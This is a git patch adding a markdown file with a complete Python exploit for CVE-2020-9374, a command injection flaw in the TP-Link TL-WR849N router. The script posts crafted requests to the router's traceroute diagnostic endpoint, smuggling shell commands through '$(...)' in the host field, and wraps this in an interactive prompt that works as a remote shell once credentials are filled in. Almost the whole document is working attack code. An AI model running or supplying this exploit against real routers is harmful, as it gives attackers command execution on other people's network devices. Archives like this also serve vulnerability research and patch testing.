From b7a5094d6eee7461b2ab6a9896cbbd5b5c25db88 Mon Sep 17 00:00:00 2001
From: Mrxn <mrxn.net@gmail.com>
Date: Mon, 2 Mar 2020 22:11:33 +0800
Subject: [PATCH] add CVE-2020-9374-TP LINK TL-WR849N - RCE

---
 CVE-2020-9374.md | 64 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 64 insertions(+)
 create mode 100644 CVE-2020-9374.md

diff --git a/CVE-2020-9374.md b/CVE-2020-9374.md
new file mode 100644
index 0000000..53fde07
--- /dev/null
+++ b/CVE-2020-9374.md
@@ -0,0 +1,64 @@
+```python
+# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
+# Version: TL-WR849N 0.9.1 4.16
+# Tested on: linux, windows
+# CVE : CVE-2020-9374
+
+
+import requests
+
+def output(headers,cookies):
+    url = 'http://192.168.0.1/cgi?1'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
+    data += 'diagnosticsState\x0d\x0a'
+    data += 'X_TP_HopSeq\x0d\x0a'
+    data += 'X_TP_Result\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    saida = r.text
+    filtro = saida.replace(': Name or service not known','')
+    filtro = filtro.replace('[0,0,0,0,0,0]0','')
+    filtro = filtro.replace('diagnosticsState=','')
+    filtro = filtro.replace('X_TP_HopSeq=0','')
+    filtro = filtro.replace('X_TP_Result=','')
+    print(filtro[:-8])
+
+def aceppt(headers,cookies):
+    url = 'http://192.168.0.1/cgi?7'
+    data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    output(headers,cookies)
+
+
+def inject(command,headers,cookies):
+    url = 'http://192.168.0.1/cgi?2'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
+    data += 'maxHopCount=20\x0d\x0a'
+    data += 'timeout=5\x0d\x0a'
+    data += 'numberOfTries=1\x0d\x0a'
+    data += 'host=\"$('+command+')\"\x0d\x0a'
+    data += 'dataBlockSize=64\x0d\x0a'
+    data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
+    data += 'diagnosticsState=Requested\x0d\x0a'
+    data += 'X_TP_HopSeq=0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    aceppt(headers,cookies)
+
+
+
+def main():
+    cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
+    headers = {'Content-Type': 'text/plain',
+      'Referer': 'http://192.168.0.1/mainFrame.htm'}
+    while True:
+        command = input('$ ')
+        inject(command,headers,cookies)
+
+
+main()
+```
\ No newline at end of file